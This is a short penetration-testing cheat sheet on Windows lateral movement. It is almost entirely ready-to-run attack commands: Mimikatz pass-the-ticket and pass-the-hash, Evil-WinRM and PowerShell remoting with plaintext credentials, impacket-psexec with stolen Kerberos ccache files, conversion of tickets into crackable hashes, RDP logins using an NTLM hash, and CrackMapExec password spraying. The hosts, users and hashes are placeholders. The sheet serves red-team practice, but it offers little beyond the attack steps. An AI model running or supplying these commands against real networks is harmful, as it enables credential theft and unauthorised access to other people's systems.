Lateral Movement
There aren't many ways to move laterally on windows. Below are the main ones.
psexec
RDP
WinRM
SSH(not likely)
PTH(pass the hash) can be used most of the time.
Mimikatz Ticket PTT
Enable-PSRemoting
mimikatz.exe '" kerberos:ptt C:\Users\Public\ticketname.kirbi"' "exit"
Enter-PSSession -ComputerName ECORP
WinRM
$pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('ECORP.local\morph3', $pass)
Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }
# Evil-WinRM
https://github.com/Hackplayers/evil-winrm
ruby evil-winrm.rb -i 192.168.1.2 -u morph3 -p morph3 -r evil.corp
PTH with Mimikatz
Invoke-Mimikatz -Command '"sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:command"'
Pass The Ccache (PTC)
Grab the ccache from remote and put into environment variable
export KRB5CCNAME=/home/morph3/Desktop/krb5cc_012345678_XXXX
Make sure the times are synced up with the DC
sudo ntpdate -u 192.168.1.231
Psexec to the target
impacket-psexec morph3@dc01.domain.local -dc-ip 192.168.1.231 -k -no-pass
** Don't include domain name in psexec. If you are having issues with the command you may remove the username as well.
Cracking Ccache
Convert the ccache file into kirbi file using a converter.
python2 /opt/ticket_converter/ticket_converter.py krb5cc_012345678_XXXX ticket.kirbi
Convert kirbi to crackable hash.
python3 /opt/kerberoast/kirbi2john.py ticket.kirbi | tee ticket_hash.txt
RDP
Impacket's rdp_check.py script is good.
impacket-rdp_check morph3:Password123@1.3.3.7
python3 /opt/impacket/examples/rdp_check.py ecorp/morph3@1.3.3.7
xfreerdp /u:morph3 /p:Password123 /v:1.3.3.7
xfreerdp /u:morph3 /pth:08df3c74ded740e1f2bcf5dea4b8daf6 /v:1.3.3.7
rdesktop 1.3.3.7 -u Administrator -p 123456
CrackMapExec
Swiss-knife tool for password spraying.
crackmapexec smb ./ips.txt -u ./users -H hashes --local-auth
crackmapexec smb 1.3.3.7 -u ./users -p ./passwords --continue-on-success --shares
Last updated